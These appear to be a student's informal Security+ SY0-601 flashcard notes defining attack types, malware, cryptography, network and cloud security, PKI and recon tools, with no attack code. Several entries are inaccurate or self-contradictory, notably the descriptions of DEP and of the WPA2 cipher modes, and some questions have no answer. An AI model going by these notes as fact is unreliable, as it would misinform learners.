CompTIA Security+

SY0-601
What is phishing?
Email for example that tries you to click on the link and reveal sensitive
information.

What is pretexting?
Attacker is a character in a situation they create
Lying to get information

What is pharming?
Can be used in case where DNS server is poisoned.
Everyone is redirected to bogus site.
Pharming harvest large groups of people

What is Vishing?
Voice phishing
Caller spoof ID

What is smishing?
Phishing over SMS to get information or click link

What is spear phishing?

Targeted phishing campaign
Whaling is targeted commonly for CFO(Chief Financial Officer)
What means eliciting information?
Extracting informatioon from the victim. Victim doesn't realize it's happening.
Often used over voice.

What is identity fraud?

Your identity can be used by others, credit card fraud, bank fraud, loan fraud,
government fraud.

What is dumpster diving?

Gathering information from garbage.

How to protect from dumpster diving?

Shred documents, lock the fence where it is located or some companies burn
down the documents.

What is shoulder surfing?

Someone from behind can see sensitive information. (works good at airports,
coffee shops, etc.)

Preventing shoulder snurfing - privacy filters, keep monitor out of sight

What are hoaxes?

A threat that doesn't actually exist - they seem they could be real
Still consumes lots of resources
Malware that pretents to be malicous and tries to get you to purchase
How can we identify spam to avoid it?

What is credential harvesting?

Attacker collects login credentials
Credentials can be stored in Chrome, Windows credential manager, outlook

What is malware?
Malicous software that is going to have negative impact on user.

Typer of malware
Viruses
Crypto - malware
Ransomware
Worms
Trojan horses
Rootkit
Keyloggers
Adware
Botnets
How can you block worms?
Firewalls and IDS/IPS can mitigate.
We need signature of that worm to put restriction on firewall between 2 systems.

What is ransomware?
May be a fake ransom to get people to pay

What is crypto-malware?
Malicious software that will encrypt your data and key to unlock it can be
obtained by paying with bitcoin

How to protect against ransomware?

Always have backup
Keep your operating system up to date
Keep your applications up to date
Keep your antivirus up to date
Keep everything up to date you fuck

What is trojan horse?

Software that look non threatening to your system.
Can disable your antivirus, create backdoors

What is PUP?
Potentially unwanted programs

What is remote access trojans?

Remote administration tools
Bad guys connect with the client software
Control a device - key logging, screen recording
What is rootkit?
Malicous software that modifies core system files - part of the kernel

What is adware?
pop-ups that advertise
Installed accidentally, mayb be included with other software
It's hard to remove them
May cause performence issues

What is spyware?
Malicious software that tries to find personal information about you.
Checks visited sites, records keystrokes

What is C&C?
Command and control server sends instructions to botnets what to perform.
Used for DDoS attacks, relay spam

What is logic bomb?

Type of attack, when seperate event is triggered.
Time bomb - at certain time or date
It's hard to identify
For example Trojan will install malware

How to prevent against logic bomb?

Formal change control
Alert on changes
Host based intrusion detection
Constant auditing
What is hash?
One way cryptographic algorithm to protect passwords

What is spraying attack?

Trying to login with an incorrect passwords will eventually lock you down
We will try top 3 passwords (123456, 123456789, querty)

What is brute force attack?

BF attacks tries every possible password combination

What is dictionary attacks?

To get passwords - we will use a dictionary to find common words - passwords
created by humans
Many common wordlists available on the internet - for medicine for example

What are rainbow tables?

An optimized , pre-build set of hashes
Saves time and storage space
Contains pre-calculated hash chains

What is salt when we are talking about

passwords?
little bit of extra data used with passwords to hash the data. This will protect
passwords from rainbow tables for example, because randomness was added.

Types of physical attacks

Malicous USB cable - cable that acts as HID - Human interface device -
connected as keyboard that will trigger command line
Malicous USB flash drive - attacker can put malicious software in PDF file or put
them in spreadsheets as micros. Can act as wireless adapter to access internal
network.

Skimming - stealing credit card information usually during a normal transaction.

Later it's used for card cloning

What can be used machine learning for?

Can prevent spam
Attackers can try to poison the AI to reveal sensitive data or to pass the AI.

Supply chain attack

Attacker infects supplier that will have access to our internal network.
For example provider can have VPN connection to our network and if he is
compromised he will get pass the firewall and is already inside our system.

What is birthday attack?

The chance of that 23 people have the same birthday is 50%, 30 people 70%, 70
people 99.9%
In the digital world, this is a hash collision - hashes suppose to be unique, the
attacker will generate mutiple verisons of plaintext to match the hashes

What is downgrade attack?

Instead of using good encryption, something not so secure is negotiated instead.
We force the communication on lower level security that can be taken advantage

Forcing clients to fallback to SSL 3.0

What is privilage escalation?

User getting root or administrative privileges on the machine to gain full access
How can we prevent from privilige escalation?
Updated anti-virus, anti-malware software
Data execution prevention - only data in executable areas can run
Address space layout randomization - prevent a buffer overrun at a known
memory address

Types of cross site scripting

Non persistent XSS attack - web allows scripts to run in user input.
Attacker emails a link that takes advantage of this vulnerability. User has to click
specific link to reveal some information

Persistent stored XSS attack - includes malicious payload (everyone gets the
payload)

What is code injection attack and types?

Adding your own information into a data stream
Enable because of bad programming

SQL injection modifies SQL query to reveal information

LDAP stores passwords and authentication information

XML - set of rules for data transfer and storage

DLL - (Windows library containing code and data) runs as part of the target
process - another application will run the program and therefore we will have
information that normally we wouldn't have.

What is buffer overflow?

One section of memory is able to overwrite another section of memory.
letter E will spill into process B and will change the hex string in variable. This
can allow crashes or some privilige escalation

What is replay attack?

Usefull information is transmitted over the network
Attacker will install network tap, arp poisoning, malware on victim to get the
data stream redirected
Gathered information can be used later to look like the client

What is session hijacking?

Attacker gains session ID to act like the client on the network

How can you protect form session hijacking?

By enrypting end to end channel - use HTTPS and force TLS

What is cross site request forgery?

Takes advantage of the trust that a web application has for the user
What is server side request forgery?
Attacker finds a vulnerable web application

What is shimming?
Allows backwards compatibility with previous version
Filling the space between two objects

What is refactoring?
Metamorphic malware - when malware is dowloaded each time it's unique.
Malware auther will add additional code - loops, pointless code strings to make
that signiture won't match

What is SSL stripping?

What is race condition?
A programming flaw, when multiple things happened at the same time and you
are not expecting it.

What is memory leak?

Unused memory is not properly released
Begins to slowly grow in size and eventually uses all availabe memory
System crashes

What is null pointer dereference?

Programming technique that references a portion of memory, which is empty
This will cause application to crash

What is directory traversal?

Allows read files from a web server that are outside of website's file directory
Won't stop users from browsing past the web server root - take advantage of
badly written code

What is resource exhaustion?

A specialized DoS attack - device wil use all the resources - bandwidths as DHCP
starvation
What is rogue access points?
An unauthorized wireless access point
Employee or an attacker add it to our network
Potential backdoor

How to protect from rogue access points?

Auditing
Consider using 802.1x network access control - you must authenticate,
regardless of the connection type

What is wireless evil twin?

Looks as legitimate AP - using same SSID and security settings
Can be used to spoof the correct AP to get the data from the air

What is bluejacking?
Sending unsolicited messages to another device via Bluetooth

What is Bluesnarfing
Access a bluetooth-enabled device and transfer data

How to protect against deauth attacks?

Important management frame are encrypted since 802.11w and was
implemented in compliance 802.11ac

What is RFID?
Radio frequency identification
It's used for access badges, animal identification, anything that needs to be
tracked
What is NFC?
Near field communication
Used for payment systems

What is nonce?
It is an arbitrary number that is used once in cryptography to add some
randomness

What is typically used as cryptographic nonce?

Initialization Vector

What is on-path network attack?

Formerly know as man in the middle attack
The original data stream will be intercepted and redirected to be modified

Can be even an malware in your browser that waits fro you to login to your bank
account

How many bits has MAC address?

48 bits / 6 bytes long

What is MAC flooding?

Attacker will send various requests with different MAC addresses
Switch will fill up the MAC table and instead all traffic is send to all interfaces
What is MAC spoofing?
Attacker will change their MAC address to match the MAC of an existing device
Used to distrupt communication

How can be DNS server poisoned?

Modify the DNS server
Modify the client host file
Send a fake response to a valid DNS request

What is URL hijacking?

URL that is badly spalled - used to redirect to competitor, advertising, phishing or
to sell such domain

Domain reputation
suspicious activity from email does matter - bad reputation can cause email
delivery to fail
SItes that are infected with malware won't be indexed

What is denial of service?

Overload the service to be not available

What can cause DoS?

Denial of service - which can be unintentionall

Layer 2 loop without STP

Bandwidth DoS - dowloading too much
The water line breaks in the ceiling
What is DDoS amplification?
Turn your small attack into a big attack
Increasing common network DDoS technique that will send little bit of data that
will reply with huge packet back. We can use DNS resolver to forward query

What is operational teechnology?

Hardware and sofware for industrial equipment
Electric grids, traffic control, manufacturing plants etc.

What are options of scripting in cybersecurity?

Windows powershell - .ps1 file extension, used for windows to access files

Python - .py file extension, popular in cloud, routers, switches, servers

Shell script - .sh file extension, scripting environment for Linux

Macros - used to make the application easier to use

Visual Basic fo Application (VBA) - macros and automation in Microsoft Office and
can talk directly to operating system

Types of threat actors

Insiders - doesn't have to be hacker, but has access to sensitive data

Nation states - have security experts, commonly used for APT - advanced
peristent threat

Hactivist - Hacker with a purpose - political or social message

Script kiddies - Uses a lot of scripts, that he doesn't have the knowledge how
they work and tries to gain access with one of them

Organized crime - professional criminals motivated by financinal gain

Hackers - often drive by money, power and ego

Shadow IT - working around the internal IT organization. People going rogue.

Types of attack vectors

Attack vector is a method to gain access

Direct access
Wireless attack
Email attack
Supply chain attack
Social media attack
Removable media attack
Cloud attack

What is threat intelligence?

Researching of threats and making decision based on gather intelligence

What is OSINT?
Open source intelligence - publicly available sources, internet, government data.

What is threat intelligence and where to get it?

Researching threats and making decisions based on it to prevent attacks

OSINT - open source (Internet, Government data, commercial data)

Vulnerability databases - CVE
Closed intelligence for private companies
Dark web

What is AIS?
Automated indicator sharing - intelligence shared freely in standart format STIX,
to securely transfer we use TAXI
What is IOC?
Indicator of compromise - to detect that we have been breached
Unusual amount of network activity
Change to file hash values
Irregular international traffic
Changes to DNS data
Ucommon login patterns
Spikes of read requests to certain files

What is CVE?
Common vulnerabilities and exposure database

Where to look for new threats?

Vendor websites
Vulnerability feeds
Conferences
Academic journals
Local industry groups
Social media

What is TTP?
Tactics, techniques and procedures - signature marks of the attacker - this might
change based on what he is attacking

Vulnerability types
Zero-day attacks
Open permissions
Unsecured root accounts
Errors
Weak encryption
Insecure protocol
Default settings
Open ports and services
Inproper patch management
Legacy platforms

What can be 3rd party risk?

Lack of vendor support - late patches
Supply chain attack
Access via VPN
Physical access at data storage

What is vulnerability impact on business?

Data loss - deleted data
Identify theft
FInancial loss
Reputation impact
Availability loss

What is threat hunting?

The constant game of cat and mouse. Find the attacker before they find you
Strategies are constantly changing

Types of scans
Non-intrusive scans
Intrusive scans
Non-credentialed scans
Credentialed scan

What is SOAR?
Security orchestration, automation and response
Automate routine, tedious and time intensive activities

What is penetration testing?

Simulating an attack to exploit vulnerabilies to gain access
What is passive footprinting?
Learn as much as you can from open source about the organization
Social media, corporate web site, online forums - reddit, social engineering,
dumpster diving

What is wardriving or warflying?

Combine WiFi monitoring and a GPS - search from your car, plane, drone

What is active footprinting?

Trying the doors
Visible on network traffic and logs
Ping scans, port scans
DNS queries
OS scans, OS fingerprinting

What is red team?

Offensive security team
Ethical hacking
Exploit vulnerabillities
Social engineering
Web application scanning

What is Blue team?

Defensive security
Operational security
Incident response
Threat hunting
Digital forensics

What is purple team?

Red and blue team working together
What is white team?
Not on a side - manages the interactions between red teams and blue teams
Enforces the rules, resolves any issues, determines the score

What is part of configuration management?

Network diagram
Baseline configuration
Standard naming convetions - asset tag, location, serial number
IP schema - subnets based on locations

What is obfuscation?
Hide some of the original data

What is diffusion?
In crypthography changing one character of the input will result in changing
many characters in the output

What is data at-rest

The data is on a storage device
We can encrypt or apply permissons on folder or files

How to secure data in-transit

Firewall, IPS, provide TLS or IPsec to encrypt them
What is tokenization?

What are data loss preventions options from

attacker?
USB blocking
We can check for data strings in data flows - cloud
We can check for inbound and outbound emails - block, quarantine

What is SSL/TLS inspection?

Browser contains a list of trusted CAs
We assign internal CA certificate to our firewall or SSL decryption

What provides hashing?

Integrity

What is Honeypots?
Virtual world for attacker to exploit to learn about their techniques.
What is DNS sinkhole?
a DNS that hands out incorrect IP addresses
Attacker can redirect you to incorrect service
We can configure it that if malware infected machine and tries to access specific
site that we redirect it and notify responsible people

What is IaaS?
Infrastructure as a service.
We are provided with hardware - we need to secure the data

What is SaaS?
Software as a service
We need to configure application
Central management of data
Google mail is SaaS

What is PaaS?
Platform as a service
You are given platform to develop your own application

What is MSP?
Managed service provider
Not all cloud service provider are MSPs
MSP support network connectivity management, backups and disaster recovery,
growth management and planning

Cloud deployment models

Public - everyone on the internet can access them
Community - several organizations share the same resources
Private - your own virtualized local data center
Hybrid - a mix public and private
What is cloud computing?
Computing on-demand = instantly available computing power
Fast Implementations, smaller costs

Can have disadvantages

latency, bandwidth, difficult to protect data, requires internet connection

What is edge computing?

Device with very specific functions - IoT
Huge amount of data
No latency - process data on the device itself

What is Fog computing?

A cloud that's a close to your data
Cloud + Internet of things
Some of the data is taken to the cloud to analyze them. Sensitive data stays on
local network.

What is thin client?

Applications run on a remote server
We don't need good hardware

What is virutalization?
Enables to run many different operating systems on the same hardware

What are containers good for?

We have one instance of operating system and each application is in their own
sandbox
applications are self-contained
What is monolithic application?
One big application that does everything
Contains all decision making processes

What is microservice architecture?

APIs managing communication
Adding new service is easy

What is FaaS?
Function as a Service
Application are seperated into individual autonomous functions

What is virtual private cloud?

a pool of resources created in a public cloud provided by transit gateway that
host can access via VPN
What is service integration and management?
Many different service providers - we are multisourcing in cloud
Provides centralize view to manage resources in the cloud in multivendor
environment

Infrastructure as code
describes an infrastructure
define servers, network and applications as code
Ability to easily deploy application instances, which have specific and same
setting

What is VM sprawl?
The virtual machines are everywhere as they are not removed. We need a formal
process to deprovision them.

What is VM escape?
We can break out of VM and interact with the host's operating system and move
between others to VM
What is sandboxing?
Isolated testing environment

Stages of building the application?

Development - sercure environment, writing code, developers test in their
sandbox

Test - we are testing if the application is working as expected

Quality assurance - verifies features are working as expected, verifies old errors
don't reappear

Staging - Testing application in real like environment. Production data are copied
for example and we test performace

Production - we deploy the application

What is scalability?
The ability to increase the workload in a give infrastructure

What is elasticity?
Increase or decrease available resource as the workload changes

What is orchestration?
Automation in cloud computing - will deploy servers, networks, switches,
firewalls = instantly provisioned

What is stored procedures?

When we are requesting data from SQL database query can me modifies. Stored
procedures limit the client interactions and modifications to the query are not
possible
What is input validation?
We need to make sure that data is correct to prevent user from perform changes
We can have server-side or client-side

What is directory services?

Keep all of an organization's usernames and passwrds in a single database
All authentication requests references this directory
Access via Kerberos or LDAP

What is federation
Provide network access to others
Third-parties can establish a federated network (Facebook, Google, Twitter)

What is attestation
Prove the hardware is really yours - system you can trust
At Verizon laptops

What is push notification

Authentication factor is pushed to a specialized app - usually on a mobile device

What can be biometric factor?

Fingerprint scanner, Retinal scanner, Iris scanner, Voice recognition, Facical
recognition

Gait analysis - how you walk, Veins

What we need to make sure when we are using
biometrics?
To make sure we have proper balance between false acceptance rate and false
rejection rate

What is AAA framework?

Authentication, Autorization and accounting

Types of authentication
Something you know - passwords, pin, patter
Something you have - smart card, USB token, hardware or software tokens,
phone
Something you are - biometrics
Somewhere you are - based on location // IP address
Something you can do - handwriting
What is redundancy and how to provide it?
Duplicate parts of the system - if a part fails the redundant part can be used

Use geographic dispersal

Disk redundancy - multipath fibre connection, RAID - redundant drive

Types of RAID
RAID 0 - no fault performance
RAID 1 - mirroring - duplicates the data - requires twice the space
RAID 5 - striping with parity = fault tolerant, only requires an additional disk for
redundancy

What is UPS?
Uninterruptible power supply
Short term backup power - we use batteries

Power redundancy options

UPS, Generators, dual power supplies, power distribution units (PDUs) - connects
to multiple devices and we can control them via ethernet

Types of data backups

Full - is taken first
Incremental - all files changes since the last incremental backup
Differential - all files changed since the last full backup

What is continuous delivery with regards to

applications?
Automate the testing and release process. One button to deploy the application
What is SAN?
Specialized high-performance network of storage devices

What is embedded system?

Hardware and software designated for a specific function

What is system on a chip?

Multiple components running on a single chip - raspberry Pi

What is Field-programmable gate array?

An integrated circuit that can be configured after manufacturing
Common in firewall logic and routers

What is HVAC?
Heating, Ventilation and Air conditioning system

How can embedded systems communicate?

Zigbee - uses mesh network
5G
SIM
Narrowband - used over a longer distance - conserve frequency. Oil fields
Baseband - using a single frequency to communicate - fiber

What are some constraints of embedded

systems?
Power, compute power, upgradability limitations, network connection, limited
cryptographic features - hardware options, inability to patch, specific function
with low cost
What can be physical security controls?
Barricades / bollards
Access control vestibules - all doors normally locked / unlocking one door
prevents from others to be opened
Alarms - circuit based, motion detection
Signs, proper lighting, fencing, fire suppression, sensors, drones
Video surveillance, Faraday cagee, DMZ zone
Industrial camouflage - facility doesn't look like data center
Security guard - ID badges
Biometrics
Door access controls - lock and key, electronic - PIN
Cable locks

What is air gap?

Most environments are shared - switches, routers, firewall
Air gap is physical disconnection from network
Stock market, Power systems, airplanes, nuclear power plan operations

What are hot and cold aisles?

In data centers we use this method to optimize cooling

What is data purging?

Removing data from an existing data store
Delete some of the data from a database

What is plaintext?
An unecrypted message

What is ciphertext?
an encrypted message
What is cipher?
the alghorithm used to encrypt and/or decrypt ciphertext

What is homomorphic encryption?

We are able to perform calculation in encrypted form

Difference between symmetric and asymmetric

encryption?
Symmetric is using single key
Asymmetric is using 2 keys - private and public

How works asymmetric encryption?

How can we geet symmetric key from

assymmetric keys?
What is elliptic curve cryptography?
Instead of numbers we use curves in cryptography
Smallers keys
Smaller storage
Perfect for mobile devices

What is digital signature and how it works?

Prove the message was not changed

What is perfect forward secrecy

Every session uses a different private key for the exchange
The session keys are not kept around

What is steganography?
Security through obscurity = message is not visible to human eye but it's visible.
Graphics as photo
Embed messages in TCP packets, invisible watermarks, image, audio, video

What is stream cipher?

Encryption is done one bit or byte at a time
High speed, low hardware complexity
It's used with symmetric encryption
The starting stat should never be the same twice - we use initialization vector IV

What is block ciphers

Encrypt fixed length groups - often 64 bit or 128 bits
Symmetric encryption
We use different modes of operations

How electronic codebook works?

ECB - Electronic Codebook = each block is encrypted with the same key
Identical plaintext blocks create identical ciphertext blocks
How Cipher block chaining works?
CBC = mode of operation to encrypt block of data
Popular as it is easy to implement
Each block is XORed with the previous ciphertext block
adds additional randomization
Use an initialization vectro for the first block

What is counter mode in encryption?

Is one of the modes to encrypt block of data
Uses incremental counter for randomness
Provides encryption with authentication
The most common is GMC - Galois counter mode
Modes to encrypt block of data
ECB - Electronic codebook
CBC - Cipher block chaining
Counter mode

What is blockchain?
A distributed ledged - everyone on the blockchain network maintains the ledge
Records and replicates to anyone and everyone
Used in payments, digital identification, supply chain monitoring

Limitations of cryptography
Easily quessed passwords without a salt
Speed - a system needs CPU and power
Size - can potentially increase the storage size
Weak keys - can be bruteforce
Time - large files can take a lot of time - Assymetric is slowerr than symmetric
Key reuse - reusing the same key reduces complexity

What we use to have secure voice or video

across the network?
SRTP - secure real-time transport protocol
Uses AES to encrypt the voice/video flow
What procotol do we use for email?
S/MIME - secure multipurpose internet mail extensions
Requires public and private key

POP3 with SSL or use IMAP with SSL

What protocol is used for secure internet

browsing?
SSL/TLS or HTTPS

What 2 protocols does IPsec use?

Authentication header = AH
Encapsulation security payload = ESP

What protocol is used for secure file transfer?

FTPS or SFTP

FTPS is using SSL to provide encryption

SFTP is using SSH and provides management functionality

What protocol is used for reading and writing

directories over an IP network?
LDAP
LDAPS - is using SSL - a non standard implementation
SASL - Simple authentication and security layer - uses kerberos or client
certificate

What protocol is used for remote access?

SSH
What can provide end point protection?
Anti-virus and anti-malware =- looks for signature

Endpoint detection and response - EDR - we are checking behavioral analysis,

machine learning, process monitoring. Can respond to the threat

Data loss prevention - DLP = we check strings in cloud, email, on host if it

contains sensitive data and block the transfer

Next generation firewall - deep packet inspection - can see what application is
used

Host-based firewall - allow or disallow incoming or outgoing application traffic.

Identify unknown process and block them, before they are executed

Host-based intrusion detection system - it's build into endpoint protection

software. Checks for signatures, heuristics, behavioral changes, writing files to
the folders

What is trusted platform module?

Hardware to help with encryption functions
Has versatile memory to store keys, hardware configuration information
Comes with unique keys burned in during production

What can provide software secure boot?

UEFI BIOS secure boot
Has manufacturer's public key - to check if update is really coming from
manufacturer
Makes sure that bootloader was signed by trusted certificate

What is trusted boot?

Bootloader verifies digital signature of the OS kernel
The kernet verifies that operating system wasn't modified > after checks boot
drivers and startup files
What is remote attestation and how it works?
Device provides an operational report to a verification server
UEFI stores a hash of the firmware, boot drivers and everything else loaded
during the secure boot and trusted boot process
Everything is encrypted, signed and send to TPM = attestation server that will
check if it matches

What is fuzzing?
Attackeer sends random input to an application to find fault

Different types of loadbalancing in network

Round robin
Weighted round-robin
Dynamic round-robin
Active/active load balancing

What is afiinity?
Many applications require coommunication to the same instance
- each user is "stuck" to the same server
- tracked through Ip address or session IDs

What is network segmentation?

We can segment physically, logically or we can have virtual segmentation
Physical - air gap
Logical - VLANS
Virtual segmentation - DMZ

What is east-west traffic?

Traffic flows within a data center
What is ephemeral key?
Keys that are not pernament

What is quantum computing?

We have qubits - which are not zero and 1 as they are zero and 1 at the same
time
Will allow us to search quickly through large databses at the same time

What is the new way of encryption post

quantum cryptography
NTRU - cryptosystem using lattice theory
Quantum network - sending random stream of qubits across the network. Both
sides verifes and agress on transferred keys, if someone listens ..it will change
the key as it will distrupt the quantum channel.

What kind of cryptography do we use with

limited amount of resources? (Low power
devices)
Symmetric encryption or elliptic curve cryptography

What is non repudiation?

We can cofirm that the data comes from the sender - we use digital signature

nonrepudiation is the ability to verify that a message has been sent and received
so that the sender (or receiver) cannot refute sending (or receiving) the
information.

What are some application security techniques?

Input validation
Error and exception handling
Secure cookies
HTTP secure headers
Code signing - trusted CA will sign a key, this key is used by developers to sign
their code
Allow or deny list to restrict some application - to access certain folders
Static code analyzers - can check for vulnerabilites in source code

What is application hardening?

minimaze the possible entry points
Open ports and services
Registry configuration in Windows database
Disk encryption
Operating system is up to date

Who is doing encryption/decryptiion in VPN?

Concetrator

Types of VPN connections

Full tunnel - we are communicating everything with VPN concentrator
Split tunnel - some data can be send out to the internet
Site to site - 2 concentrators doing encryption and decryption between 2 sites
(L2TP - connecting them as they would be in the same network)
2 ways of sending encrypted data over IPSec
tunnel
Transport mode - IP header is in the clear
Tunnel mode - protects everything

What doens't provide AH?

Encryption, but provides authentication - data origin

What provides encryption inside of IPSec

tunnel?
ESP

What provides portfast?

It will bypass the listening and learning states

What provides BPDU guard?

When wer are using portfast we don't want the switch to be connected to that
port - we will configure it as BPDU guard as well and it will shut down interface if
it will send an BPDU

What is DHCP snooping?

We will configure router with trusted routers, switches, DHCP server
If DHCP comes from untrusted device it will filter it out.
What is FIM?
File integrity monitoring - some files change all the time and some should never
change
Linux - Tripwire
Windows - SFC system file checker

What can provide firewall?

Filter traffic by port number or application
Encrypt traffic - VPN between sites
It can be layer 3 devices - sits between ingress and egress networks
Can provide NAT and authentication

What is the difference between stateless

firewall and stateful firewall?
Stateless firewall - doesn't keep track of traffic flows - each packet is individually
examined. Doesn't determine that respond from the web server will follow the
request. We need to cover communication in both ways

Stateful firewall - everything within a valid flow is allowed. They will remember
that session was requested before and therefore will allow communication the
other way. It is creating a session table.

What is UTM and what it provides?

Unified Threat Management
Provides:
URL filter, Malware inspection, Spam filter, Firewall, IDS/IPS, VPN endpoint,
Router/switch, Bandwith shaper

What is web application firewall?

Applies rules to HTTP and HTTPS
Allow or deny based on expected intput - against an SQL injection type of attacks
Difference between edge and access control?
Edge - managed primarily through firewall rules that rarely change
Access control - based on many rules, can control inside or outside
communication of the network

What is posture assessment?

Before connecting to corporate network with our own device - we can check
various application, if it's running anti-virus if it's updated etc.

How can we implement posture assessment?

Persistent agents - permanently installed onto a system
Dissolvable agents - no instalation is required, terminates when no longer
required
Agentless NAC - Integrated with active directory. Checks are made during login
and logoff. Can't be scheduled.

What is forward proxy?

Commonly used to protect and control user access to the internet
Will forward traffic for the user. Check if it's safe and send it.

What is reverse proxy?

Inbound traffic from the internet to your internal service

What is open proxy?

A third party uncontrolled proxy
Can be a significant security concern as they cirumvent existing security
controls.

What is passive monitoring on the network?

It can be SPAN, we are collecting data, but can't block traffic in real time
What is out of band response?
Copy of the traffic is send to IPS. If it detects malicious flow it won't stop the first
flow, but will stop the additional one as it will disconnect them.

What is inline monitoring?

IPS is in our network before switch. It is able to block traffic in real time if it's
malicous and it will never reach the destination

What are indetification technologies for

threats?
Signature-based - loof for perfect match
Anomaly-based - builds a baseline for what is normal
Behavior-based - observe and report
Heuristics - uses AI

What is jump server?

Allows us to have access to secure network zones
Highly securee device
We use SSH / Tunnel / VPN to the jump server or this connection from the jump
server

What standard should be used for wireless

communication?
WPA3

Why is WPA2 not secured?

We can listen to 4 way handshake and capture the hash to bruteforce it
Why is WPA3 more secure than WPA2?
Includes mutual authentication
Creates a shared session key without sending that key across the network
No more 4 way handshakes, no hashes, no brute force attacks
Adds perfect forwards secrecy

What is SAE?
Simultaneous Authentication of equals - we get preshared keys to communicate
without sending it through the network
Derived from Diffie-Helman key exchange

What is WPS?
WiFi protected setup
Allows easy setup of a mobile device (NFC, PIN, push a button on access point )
It's not really secure and better to turn it off as PIN is easily cracked

What is EAP?
Extensible authentication protocol - an authentication framework for WiFi
PEAP is secures and we are using TLS tunnel

How many satelites do you need to pinpoint

someones location?
4

What we use to protect our network from

personal devices?
Mobile device management - we can set policies on apps, data, camera etc.
What is mobile content management?
Secure access to data
File sharing and viewing
Ensure data is encrypted on the mobile devices

What is geolocation?
Precise tracking details - find your phone, you
May be managed by MDM
We can apply geofencing - disable camera, when we are inside the office for
example

What is context-aware authentication?

Combine multiple contexts
Where you normally login (IP address)
GPS location
Other devices that might be paired

What is containerization in context to mobile

devices?
We can have space for companies and private data.
Device is split into two pieces

What is MicroSD HSM?

Piece of hardware (Security module)
Provides encryption, key generation, digital signatures, authentication
Can store cryptocurrency

What is Unified Endpoint Management?

Manage mobile and non-mobile devices
End user can use different devices - we know it's secure and they are using
secure applications
What is mobile application management?
Provision update and remove apps
We can create app catalog and all the application will download
We can monitor application use and remotely wipe application data

What is rooting/jailbreaking?
Gaining access to operating system on mobile phone
We can install apps directly - don't have to go through app store

Mobile deployment models

Bring your own device - employee owns the device - difficult to secure

COPE - Coporate owned, personally enabled - company buys the device and
keeps full control of the device. Information is protected.

CYOD - Choose your own device. Company will purchase for you.

Corporate-owned - The company owns the device and controls the content on
the device. You need another phone for personal use

Virtual desktop infrastructure or Virtual mobile infrastructure - data is stored

securely, centralized. We are remotely accessing the data and nothing is saved
localy.

What is identity and access management (IAM)?

We control who gets access and to what
Map job fucntions to roles
Provides access to cloud resources - we set policies
Centralized account

Types of encryption in the cloud

Server side encryption - encrypt the data in the cloud - when we store it on an
disk
Client side encryption - we are encrypting the data locally and send it already
encrypted to the cloud.

What is replication?
Copy data from on eplace to another
Disaster recovery, high availability

What is denamic resource allocation?

Provision resource when they are needed - based on demand in cloud
We use compute cloud instances

What security protocol does WPA2 use?

CCMP block cipher mode

What is the difference between WPA2 and

WPA3 with regards to protocol?
WPA2 and 3 both use GCMP block cipher mode, but WPA2 uses message integrity
check (MIC) with CBC-MAC.
WPA3 uses message integritty check with Galois message authentication code
(GMAC)

What is cloud access security broker (CASB)?

Clients are on local network and data is in the cloud.
Allows us to control what data can be transferred

What can Next-Gen secure web gateway do?

Goes beyond URLs and GET requests
Examines the application API, JSON string and allow or disallow certain activities
Who is indentity provider?
a service needs to vouch for you
commonly used by SSO applications or an authentication process
We associate employee with some of his personal attributes - name, email
address, phone number, employee ID

What can provide digital certificate assign to a

person or device?
Has public an private key therefore can encrypt data, create digital signatures

What is PKI?
Public key infrastructure

How to create an SSH key-based authentication

on Linux?
ssh-keygen
ssh-copy-id user@host
ssh user@host

Different types of accounts on operating

system
Private - have specific privileges

Shared - difficult to manage, audit and know who did what

Gest account - Usually don't have password, but are very restricted

Service account - different service should have different account - no interacive/

user access

Priviliged account - elevated access as root or admin. It needs to be secure - 2FA,

password changes. We should only log to them when we need to make changes
and mostly use our normal account
What are some account policies?
Password policies - complexity, lenght
Account lockout policies
Disable account when someone leaves the company
Geolocation policies - allow login from certain country

What is knowledge-based authentication?

During login we are asked personal question and we have limited time to answer
them
Often used with account recovery

What is PAP?
a basic authentication method
Weak authentication scheme - no encryption during the exchange
Application would need to provide encryption

What is CHAP and how it works?

Challenge-handshake authentication protocol
Three way handshake
Challenge response continues periodically during the connection

Different type of authentication systems

Radius
TATACS
Kerberos
802.1x

How authentication with Kerberos works?

What is open standard for authentication and

authorization on the internet?
SAML - not designated for mobile apps

How SAML works?

Clinets will request to resource server > it will repond with SAML request > client
will authorize with authorization server > authorization server will respond with
SAML token > client will provide token to resource server
What is used instead of SAML nowadays?
OAuth - used with OpenID that handles authentication
OAuth - provides authorization to the applicaton
We can limit what the given application can use and have access to

What is mandatory access control?

The operating system limits the operation on an object - based on security
clearance levels
Every object gets a label

What is discetionary access control?

Used in most operating systems
You create a spreadsheet as the owner - you can control who has access to it

What is role-based access control?

You have a role in your organization and you have assigns right based on that
role.

What is attribute-based access control?

Access may be based on many idfferent criteria
- resource information, IP address, time of day, desired action, relationship to the
data

What are important certificate attributes?

Common name - CN
Subject alternative name - additional host names for the cert
Expiration
Difference between DV and EV in certification
DV - domain validation - owner of the certificate has some control over a DNS
domain
EV - additional checks have verified the certificate owner's identity

Different type of ceritificates

Root certificate - everything starts here - we usually disconnect this from
network. We need to secure it to not be compromised

Self-signed certificates - internal, your company is the only one going to u se it

Machine and computer certificates - management software - we can validate

that hardware is ours

Email certificates - use cryptography in an email platform, encryptinig emails,

digital signatures

User certificates - additional authentication factor - physical cards

What is the standard format for digital

certificates?
X.509

Different type of formats for certificates

DER - binary format, often used with java
PEM - BASE64 encoded DER certificate
CER - primarily used in windows - encoded as DER or ASCII PEM format - usually
contains a public key
PKCS #12 - stores many certificates in the same container
PKCS #7 (.p7b file) - private keys are not included. Supports MW, Java Tomcat.
It's human readable

How to you check if certificate was revoked?

We use OCSP stapling - online certifficate status protocol
Certificate holder can verify their own status and it's "stapled" into the SSL/TLS
handshake

How to confirm that we are really

communicating with the server?
We can use pinning - we are adding certificate to the application we are using. If
application certificate don't match with the server - we can close the app

Different PKI trust relationships

Single CA
Hierarchical - single CA issues certs to intermediate CAs
Mesh
Web of trust - if A trust B and B trust C, A will trust C
Mutual authentication - server authenticates to the client and the client
authenticates to the server

What is certificate chaining?

Any certificate between the SSL certificate and the root certificate is a chain
certificate

What are some reconnaissance tools

Traceroute - tracert
NSlookup - slowly replaced by dig. Finds DNS server, IP address
Dig
IPconfig, ifconfing - our information about network adapter
Ping - troubleshooting tool
Netstat - network statistics
Arp - MAC addresses
Route - routing table
Curl - source code of web server
hping - it can modify ping (TCP, UDP, port)
Nmap - scanning ports
theHarvester - scrape information from Google or Bing or DNS brute force - VPN,
chat, mail, partner
Sn1per - combines many recon tools, metaspoit, nmap, theHarvester and much
more
